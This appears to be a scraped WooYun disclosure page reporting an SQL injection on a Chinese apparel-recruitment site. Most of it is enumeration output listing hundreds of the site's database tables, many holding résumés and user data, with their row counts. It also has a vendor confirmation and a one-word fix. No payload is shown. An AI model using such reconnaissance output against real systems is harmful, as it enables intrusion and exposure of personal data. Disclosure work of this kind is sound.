 | dbo.enterprise_openbaidu           | 42493   |
 | dbo.Desktop                        | 41063   |
 | dbo.adv_click                      | 40801   |
 | dbo.trackback                      | 39149   |
 | dbo.dy_zhoukan                     | 36676   |
 | dbo.resume_ability                 | 35666   |
 | dbo.oa_input_list                  | 34006   |
 | dbo.my_show_ding                   | 30289   |
 | dbo.guzhu_meiti                    | 28339   |
 | dbo.OptionName                     | 28267   |
 | dbo.baihuolingshou                 | 27225   |
 | dbo.resume_pingbi                  | 25877   |
 | dbo.yaoqing_content                | 25044   |
 | dbo.fw_user                        | 24584   |
 | dbo.edu_tplist                     | 24270   |
 | dbo.oa_enter_fenpei                | 23789   |
 | dbo.oa_fenpei_member               | 23780   |
 | dbo.adv_home_bak                   | 23608   |
 | dbo.oa_plan_week_list              | 21750   |
 | dbo.blog                           | 21150   |
 | dbo.sunysms_p                      | 20857   |
 | dbo.lietou_resume                  | 19787   |
 | dbo.hn_hfview                      | 19238   |
 | dbo.adv_home_notnull_view          | 18115   |
 | dbo.adv_home_notnull_view_fb2      | 18115   |
 | dbo.Temp_gzjl                      | 17504   |
 | dbo.job_m_1                        | 17457   |
 | dbo.resume_pg                      | 17252   |
 | dbo.pg_enter_cost_view             | 16150   |
 | dbo.enter_pg_order                 | 15187   |
 | dbo.lt_resume_ck                   | 14844   |
 | dbo.enter_pg_order_view            | 14827   |
 | dbo.enter_invite_mb                | 14800   |
 | dbo.pg_enter_down_resume_view      | 13982   |
 | dbo.MBTI_answer                    | 13740   |
 | dbo.enter_invite_bak               | 13366   |
 | dbo.blog_user_setting              | 12957   |
 | dbo.QYXUQIU2013                    | 12350   |
 | dbo.my_show_comment                | 12110   |
 | dbo.blog_user_link                 | 10652   |
 | dbo.zhishu_data                    | 10571   |
 | dbo.art_score                      | 10502   |
 | dbo.expo_company                   | 10358   |
 | dbo.expo_company_main              | 10358   |
 | dbo.personal_yanzheng              | 10139   |
 | dbo.enterprise_hits                | 9477    |
 | dbo.blog_photo                     | 9441    |
 | dbo.OpenIds                        | 9239    |
 | dbo.wailian_dengji                 | 9197    |
 | dbo.resume_in                      | 9122    |
 | dbo.ItemTable                      | 8896    |
 | dbo.enter_hot_list                 | 8308    |
 | dbo.personal_service_history       | 7760    |
 | dbo.VIEW_art_resume_all            | 7599    |
 | dbo.enterprise_server              | 7413    |
 | dbo.enter_sms_list                 | 7370    |
 | dbo.ask2                           | 7321    |
 | dbo.enter_fw_history               | 7212    |
 | dbo.adv_home_notnull_view_fb1      | 6993    |
 | dbo.xc_personal                    | 6970    |
 | dbo.personalxc_view                | 6911    |
 | dbo.ask1                           | 6881    |
 | dbo.show_tag                       | 6822    |
 | dbo.lietou_resume_hf               | 6817    |
 | dbo.quick_talented_resume          | 6709    |
 | dbo.enterprise_search              | 6666    |
 | dbo.enter_Favorite                 | 6062    |
 | dbo.FavoriteResumes_view           | 5712    |
 | dbo.guzhu_tp                       | 5583    |
 | dbo.RENCAIXUQIU2013                | 5577    |
 | dbo.lt_JianLi                      | 5533    |
 | dbo.oa_message_ckz                 | 5510    |
 | dbo.show_card                      | 5470    |
 | dbo.art_pinglun_view               | 5161    |
 | dbo.ck_resume_ly                   | 5076    |
 | dbo.enter_member_hf                | 5072    |
 | dbo.edu_word                       | 5038    |
 | dbo.lingshourc                     | 5000    |
 | dbo.resumenews_view                | 5000    |
 | dbo.enter_pg_gbook                 | 4742    |
 | dbo.enter_talk_bm                  | 4712    |
 | dbo.cfw_zhzt                       | 4411    |
 | dbo.resume_dianping                | 4371    |
 | dbo.enter_pg_gbook_view            | 4348    |
 | dbo.ehr_pg_gbook_member            | 4343    |
 | dbo.test_Content                   | 4102    |
 | dbo.weixin_tuijian                 | 4052    |
 | dbo.eng_resume                     | 3962    |
 | dbo.blog_message                   | 3852    |
 | dbo.oa_plan_week                   | 3767    |
 | dbo.subject                        | 3559    |
 | dbo.comment                        | 3514    |
 | dbo.pg_enter_store_view            | 3511    |
 | dbo.enter_lxbak_view               | 3505    |
 | dbo.edu_information                | 3503    |
 | dbo.gbook_news                     | 3397    |
 | dbo.hf_sw_view                     | 3318    |
 | dbo.kf_hfview_3                    | 3318    |
 | dbo.edu_member_zhaopinhui          | 3311    |
 | dbo.kf_hf_view                     | 3273    |
 | dbo.kf_hfview_2                    | 3273    |
 | dbo.personal_dingdan               | 3196    |
 | dbo.resume_gzjl                    | 3181    |
 | dbo.expo_user_log                  | 3124    |
 | dbo.VIEW_art_resume                | 3086    |
 | dbo.point_adv                      | 3079    |
 | dbo.EmployeeEnterpriseRegions      | 3072    |
 | dbo.blog_myfriend                  | 3030    |
 | dbo.enterprise_pg                  | 3027    |
 | dbo.email_record                   | 2959    |
 | salary.records                     | 2948    |
 | dbo.personal_chongzhi              | 2806    |
 | dbo.adv_home                       | 2779    |
 | dbo.tb_kc                          | 2749    |
 | dbo.art_comment                    | 2722    |
 | dbo.art_user_gbook                 | 2690    |
 | dbo.enter_member_pg_view           | 2656    |
 | dbo.blog_sys_message               | 2640    |
 | dbo.wsbm                           | 2482    |
 | dbo.personal_service               | 2474    |
 | dbo.resume_wf                      | 2246    |
 | dbo.blog_phototype                 | 2227    |
 | dbo.Expo_main                      | 2125    |
 | dbo.qiye_pingpai                   | 2072    |
 | dbo.personal_srczph                | 1966    |
 | dbo.oa_plan_month_list1            | 1954    |
 | dbo.DIAOYAN_GUYUAN2013             | 1872    |
 | dbo.model_comment                  | 1803    |
 | dbo.adv_home_ehr_dq_view           | 1792    |
 | dbo.cfw_count                      | 1776    |
 | dbo.lietou_rc                      | 1707    |
 | dbo.enter_member_service           | 1698    |
 | dbo.pugong_success_view            | 1649    |
 | dbo.mobile_nz                      | 1635    |
 | dbo.lt_resume                      | 1614    |
 | dbo.enterprise_talented_stores     | 1541    |
 | dbo.enter_pro_buy                  | 1514    |
 | dbo.personal_gwc                   | 1481    |
 | dbo.edu_huifang                    | 1476    |
 | dbo.book_dingdan                   | 1460    |
 | dbo.quan_fwz                       | 1447    |
 | dbo.guzhu_hr_review                | 1417    |
 | dbo.enter_pg_accept                | 1416    |
 | dbo.edu_news_review                | 1387    |
 | dbo.oa_plan_week_uqd               | 1340    |
 | dbo.enter_pg_service_view          | 1337    |
 | dbo.pk_tp                          | 1330    |
 | dbo.enter_zpzt                     | 1316    |
 | dbo.pg_accept_resume               | 1291    |
 | dbo.edu_about_gbook                | 1266    |
 | dbo.Verification                   | 1223    |
 | dbo.resume_edu                     | 1211    |
 | dbo.enter_job_email_service        | 1201    |
 | dbo.lietou_order                   | 1149    |
 | dbo.Temp_srczph_toupiao            | 1096    |
 | dbo.oa_plan_month                  | 1084    |
 | dbo.edu_member                     | 1061    |
 | dbo.personal_zj_temp               | 1035    |
 | dbo.personal_zfjl                  | 1014    |
 | dbo.edu_from_email                 | 983     |
 | dbo.edu_a_rec                      | 917     |
 | dbo.wenjuan_salarycount            | 912     |
 | dbo.SurveyName                     | 906     |
 | dbo.book_name                      | 887     |
 | dbo.guzhu_baoming                  | 875     |
 | dbo.my_show_vod                    | 848     |
 | dbo.lietou_zhiwei                  | 842     |
 | dbo.telhj                          | 840     |
 | dbo.edu_news                       | 810     |
 | dbo.model_photo                    | 805     |
 | dbo.VIEW_active                    | 796     |
 | dbo.VIEW_resume_personal           | 796     |
 | dbo.expo_user                      | 740     |
 | dbo.nearkeys                       | 719     |
 | dbo.ywhfview                       | 718     |
 | dbo.oa_salestable                  | 716     |
 | dbo.guzhu_pinglun                  | 692     |
 | dbo.guzhu_club                     | 658     |
 | dbo.post_xiangguan                 | 649     |
 | dbo.enterprise_news                | 623     |
 | dbo.oa_message                     | 619     |
 | dbo.enter_hd_view                  | 605     |
 | dbo.my_show_piaoshu_view           | 600     |
 | dbo.[Job-matching-email]           | 587     |
 | dbo.link                           | 543     |
 | dbo.enterprise_invite_temp         | 538     |
 | dbo.cat                            | 535     |
 | dbo.blogteam                       | 498     |
 | dbo.feedback                       | 498     |
 | dbo.enterprise_zhuanfa             | 489     |
 | dbo.review                         | 488     |
 | dbo.lietou_rc_ck                   | 479     |
 | dbo.lietou_apply                   | 469     |
 | dbo.edu_college                    | 452     |
 | dbo.OA_words                       | 450     |
 | dbo.edu_fc                         | 434     |
 | dbo.invest_1485                    | 426     |
 | dbo.salary_bm                      | 409     |
 | dbo.cfw_pictures                   | 408     |
 | dbo.book_collection                | 403     |
 | dbo.weixin_dingyue                 | 394     |
 | dbo.lietou_zw_rc                   | 383     |
 | dbo.city_entrance                  | 379     |
 | dbo.fashion_gm                     | 374     |
 | dbo.e_city_entrance                | 370     |
 | dbo.edu_course                     | 370     |
 | dbo.oa_news                        | 360     |
 | dbo.blog_photo_comment             | 355     |
 | dbo.quan                           | 348     |
 | dbo.kehu_gy                        | 309     |
 | dbo.yao_hf                         | 308     |
 | dbo.q_bbs                          | 299     |
 | dbo.post_sort                      | 297     |
 | dbo.oa_enter_alarm                 | 290     |
 | dbo.wailian_luntan                 | 290     |
 | dbo.enter_zlt_reson                | 287     |
 | dbo.hetong                         | 287     |
 | dbo.book_order_ks                  | 280     |
 | dbo.salary_bm_hf                   | 271     |
 | dbo.weixin_huojiang                | 270     |
 | dbo.enter_kh_pj                    | 256     |
 | dbo.post_seosort                   | 254     |
 | dbo.server_order                   | 252     |
 | dbo.gbook_kplan                    | 248     |
 | dbo.zhuhe_5year                    | 245     |
 | dbo.art_dsjg                       | 235     |
 | dbo.train_kcs                      | 233     |
 | dbo.zhishu_data_gd                 | 232     |
 | dbo.BrandSort                      | 221     |
 | dbo.Temp_srczph_number             | 220     |
 | dbo.expo_user_cost                 | 216     |
 | dbo.expo_user_xiaofei              | 216     |
 | dbo.adv_sort                       | 213     |
 | dbo.enterprise_chongzhi            | 211     |
 | dbo.oa_plan_month_plan             | 199     |
 | dbo.tel_hf                         | 195     |
 | dbo.guzhu_hr                       | 192     |
 | dbo.lietou_class_job               | 188     |
 | dbo.oa_feedback                    | 186     |
 | dbo.hr_zk_mail                     | 183     |
 | dbo.OA_admins                      | 180     |
 | dbo.post_name                      | 178     |
 | dbo.enterprise_emember             | 172     |
 | dbo.video_resume                   | 169     |
 | dbo.asphtml                        | 166     |
 | dbo.ks_zhaopin                     | 165     |
 | dbo.MBTI_result                    | 160     |
 | dbo.art_user_type                  | 149     |
 | dbo.news_smallclass                | 137     |
 | dbo.qiye_salary                    | 136     |
 | dbo.freshing_feedback              | 132     |
 | dbo.edu_sort                       | 126     |
 | dbo.tb_users                       | 125     |
 | dbo.resume_mishu_view              | 123     |
 | dbo.train_kc_xs                    | 121     |
 | dbo.edu_wsbm                       | 120     |
 | dbo.tb_sort                        | 117     |
 | dbo.edu_coop                       | 116     |
 | dbo.apply_design                   | 105     |
 | dbo.edu_infos                      | 105     |
 | dbo.brand_title                    | 101     |
 | dbo.art_select                     | 100     |
 | dbo.show_card_hf                   | 99      |
 | dbo.eng_enter_invite               | 97      |
 | dbo.enter_tb_users                 | 94      |
 | dbo.MBTI_questions                 | 94      |
 | dbo.enter_sxy_view                 | 92      |
 | dbo.dc_personal                    | 91      |
 | dbo.personal_dc_view               | 91      |
 | dbo.enter_hd_hf                    | 89      |
 | dbo.enterprise_section_member      | 89      |
 | dbo.lietou_zw                      | 89      |
 | dbo.oa_website                     | 88      |
 | dbo.personal_service_temp          | 86      |
 | dbo.dc                             | 81      |
 | dbo.enter_feedback                 | 81      |
 | dbo.Temp_srczph_choujiang          | 76      |
 | dbo.oa_yw_hflist                   | 75      |
 | dbo.guzhu_qypic                    | 73      |
 | dbo.zhishu_cont                    | 71      |
 | dbo.jobSort                        | 69      |
 | dbo.book_word                      | 63      |
 | dbo.rcly_hf                        | 62      |
 | dbo.pk_pinglun                     | 61      |
 | dbo.edu_link                       | 60      |
 | dbo.guzhu_temp_bm                  | 59      |
 | dbo.lt_ZhiWei_Code                 | 58      |
 | dbo.train_bm                       | 58      |
 | dbo.edu_school                     | 56      |
 | dbo.enter_pg_service               | 56      |
 | dbo.office_lx                      | 56      |
 | dbo.cfw_category                   | 55      |
 | dbo.oa_news_sort                   | 55      |
 | dbo.webjob_admin_ip                | 55      |
 | dbo.edu_xyds_bm                    | 54      |
 | dbo.korea_resume_gbook             | 51      |
 | dbo.brand_adv                      | 50      |
 | dbo.edu_honor                      | 50      |
 | dbo.oa_admins_phone                | 50      |
 | dbo.xyzp_resume_view               | 50      |
 | dbo.domain_purchase                | 47      |
 | dbo.edu_member_adv                 | 47      |
 | dbo.hr_news_type                   | 47      |
 | dbo.lietou_qy                      | 47      |
 | dbo.art_club_links                 | 46      |
 | dbo.book_order                     | 46      |
 | dbo.enter_pg_sort                  | 46      |
 | dbo.oa_leadmail                    | 46      |
 | dbo.q_gbook                        | 46      |
 | dbo.cfw_select                     | 45      |
 | dbo.book_sort                      | 43      |
 | dbo.dc_ehr                         | 43      |
 | dbo.hr_club                        | 42      |
 | dbo.tb_type                        | 42      |
 | dbo.edu_cat                        | 40      |
 | dbo.enter_dc_view                  | 39      |
 | dbo.SmallClass                     | 39      |
 | dbo.enter_fuli                     | 38      |
 | dbo.my_show_vod_type               | 38      |
 | dbo.lietou_qy_hf                   | 36      |
 | dbo.train_kc_type                  | 35      |
 | dbo.user_honor                     | 35      |
 | dbo.korea_resume                   | 34      |
 | dbo.my_show_buy                    | 34      |
 | dbo.enter_pg_gbook_hf              | 33      |
 | dbo.Ft_sqlin                       | 32      |
 | dbo.link_sort                      | 32      |
 | dbo.adv_home_hot_view              | 31      |
 | dbo.p_home_page                    | 31      |
 | dbo.enter_post_server              | 30      |
 | dbo.classname                      | 29      |
 | dbo.expo_type                      | 29      |
 | dbo.jifen_set                      | 29      |
 | dbo.wx_shouji                      | 28      |
 | dbo.edu_style                      | 27      |
 | dbo.blog_abtype                    | 26      |
 | dbo.lietou_sort                    | 26      |
 | dbo.userskin                       | 26      |
 | dbo.enterprise_service_info        | 24      |
 | dbo.edu_adv_home                   | 23      |
 | dbo.edu_Lecturer                   | 23      |
 | dbo.find                           | 23      |
 | dbo.book_comment                   | 21      |
 | dbo.college_pingxuan               | 21      |
 | dbo.expo_user_hf                   | 21      |
 | dbo.hy_type                        | 21      |
 | dbo.haiwai_apply                   | 20      |
 | dbo.pk_info                        | 20      |
 | dbo.lecture_article                | 19      |
 | dbo.art_dsort                      | 18      |
 | dbo.enterperise_jobdetail_template | 17      |
 | dbo.gbook_news_hf                  | 17      |
 | dbo.Lecturer_sort                  | 17      |
 | dbo.news_bigclass                  | 17      |
 | dbo.zj_type                        | 17      |
 | dbo.blog_type                      | 16      |
 | dbo.lietou_word                    | 16      |
 | dbo.MBTI_instruction               | 16      |
 | dbo.OA_depart                      | 16      |
 | dbo.edu_member_type                | 15      |
 | dbo.edu_news_sort                  | 15      |
 | dbo.oa_fq_sort                     | 15      |
 | dbo.pagestyle                      | 15      |
 | dbo.edu_gbook                      | 14      |
 | dbo.enter_kc_sort_view             | 14      |
 | dbo.enter_tb_kc                    | 14      |
 | dbo.fashion_art_comment            | 14      |
 | dbo.guzhu_club_pic                 | 14      |
 | dbo.video_company                  | 14      |
 | dbo.zt_type                        | 14      |
 | dbo.jobpg_favorite                 | 13      |
 | dbo.oa_website_sort                | 13      |
 | dbo.art_design_type                | 12      |
 | dbo.sort                           | 12      |
 | dbo.DefineCode                     | 11      |
 | dbo.edu_links                      | 11      |
 | dbo.edu_pxbm                       | 11      |
 | dbo.email_test                     | 11      |
 | dbo.oa_feedback_hf                 | 11      |
 | dbo.Vote                           | 11      |
 | dbo.friend_sort                    | 10      |
 | dbo.personal_product               | 10      |
 | dbo.resume_skill                   | 10      |
 | dbo.usertype                       | 10      |
 | dbo.selects                        | 9       |
 | dbo.show_card_sort                 | 9       |
 | dbo.video_type                     | 9       |
 | dbo.dclass                         | 8       |
 | dbo.expo_user_service_jl           | 8       |
 | dbo.lecture_file                   | 8       |
 | dbo.maintemp                       | 8       |
 | dbo.OA_zw                          | 8       |
 | dbo.personal_sms_list              | 8       |
 | dbo.pk_type                        | 8       |
 | dbo.surv_type                      | 8       |
 | dbo.enter_pro_type                 | 7       |
 | dbo.invest_sort                    | 7       |
 | dbo.lietou_zw_bak                  | 7       |
 | dbo.network_zph                    | 7       |
 | dbo.survey_ehr_fw                  | 7       |
 | dbo.train_bbs                      | 7       |
 | dbo.art_type                       | 6       |
 | dbo.edu_study                      | 6       |
 | dbo.enter_hd_type                  | 6       |
 | dbo.guzhu_dsort                    | 6       |
 | dbo.oa_kftype                      | 6       |
 | dbo.shop_help                      | 6       |
 | dbo.Template                       | 6       |
 | dbo.edu_admin                      | 5       |
 | dbo.Expo_hy_type                   | 5       |
 | dbo.Expo_lb_type                   | 5       |
 | dbo.expo_user_chongzhi             | 5       |
 | dbo.expo_user_type                 | 5       |
 | dbo.guzhu_news                     | 5       |
 | dbo.oa_news_gbook                  | 5       |
 | dbo.ProtectionIgnoreDays           | 5       |
 | dbo.survey_per_fw                  | 5       |
 | dbo.sysskin                        | 5       |
 | dbo.vod_type                       | 5       |
 | dbo.blog_mb_back                   | 4       |
 | dbo.blog_mtype                     | 4       |
 | dbo.book_gong                      | 4       |
 | dbo.edu_adv_sort                   | 4       |
 | dbo.Expo_Submit                    | 4       |
 | dbo.hr_club_type                   | 4       |
 | dbo.edu_link_sort                  | 3       |
 | dbo.edu_zj                         | 3       |
 | dbo.ehr_pingbi                     | 3       |
 | dbo.enter_feedback_hf              | 3       |
 | dbo.enter_sms_mb                   | 3       |
 | dbo.lietou_topic_gbook             | 3       |
 | dbo.q_type                         | 3       |
 | dbo.user_grade                     | 3       |
 | dbo.book_type                      | 2       |
 | dbo.chongzhi                       | 2       |
 | dbo.edu_favorites                  | 2       |
 | dbo.edu_oamessage_ckz              | 2       |
 | dbo.eng_enter_accept_resume        | 2       |
 | dbo.eng_enterprise_accept          | 2       |
 | dbo.itpro                          | 2       |
 | dbo.lieshou_pj                     | 2       |
 | dbo.personal_pro_sort              | 2       |
 | dbo.VoteType                       | 2       |
 | dbo.__MigrationHistory             | 1       |
 | dbo.adv                            | 1       |
 | dbo.bloginfo                       | 1       |
 | dbo.bottom                         | 1       |
 | dbo.down_resume                    | 1       |
 | dbo.edu_message                    | 1       |
 | dbo.eng_enterprise_member          | 1       |
 | dbo.eng_huifang                    | 1       |
 | dbo.enterprise_pingpai             | 1       |
 | dbo.filtrate                       | 1       |
 | dbo.freshing_jilu                  | 1       |
 | dbo.guzhu_content                  | 1       |
 | dbo.hr_tool                        | 1       |
 | dbo.invest_1320                    | 1       |
 | dbo.invest_1321                    | 1       |
 | dbo.invest_1322                    | 1       |
 | dbo.invest_1324                    | 1       |
 | dbo.invest_1328                    | 1       |
 | dbo.invest_1330                    | 1       |
 | dbo.invest_1331                    | 1       |
 | dbo.invest_1333                    | 1       |
 | dbo.invest_1339                    | 1       |
 | dbo.lietou_qy_service              | 1       |
 | dbo.lietou_rc_hf                   | 1       |
 | dbo.lockip                         | 1       |
 | dbo.lt_resume_hf                   | 1       |
 | dbo.oa_onlyLogin                   | 1       |
 | dbo.shop_news                      | 1       |
 | dbo.xcconfig                       | 1       |
 | dbo.zh_guo                         | 1       |
 | dbo.zhishu_left                    | 1       |
 +------------------------------------+---------+

数据

oa系统管理员

家庭住址等各种都泄露我这里就不一个一个跑了

修复方案：

过滤

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-04-09 11:37

厂商回复：

感谢贵站给出的检测结果！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-09 10:48 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

1

据说有礼物的嘿嘿

1# 回复此人
2016-05-24 19:19 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg？得失乐与悲与Av Qq205655539)

0

qwq

2# 回复此人

漏洞概要 关注数(7) 关注此漏洞

缺陷编号： WooYun-2016-186040

漏洞标题： 中国服装人才官网某站SQL注入打包(涉及百万用户数据/简历信息等)

相关厂商： cfw.cn

漏洞作者： 黑色键盘丶

提交时间： 2016-04-09 10:00

公开时间： 2016-05-24 11:40

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 14

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(7) 关注此漏洞

漏洞标题：中国服装人才官网某站SQL注入打包(涉及百万用户数据/简历信息等)

漏洞作者：黑色键盘丶

危害等级：高

漏洞状态：厂商已经确认

Tags标签：注射技巧

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞评价(共0人评价):

登陆后才能进行评分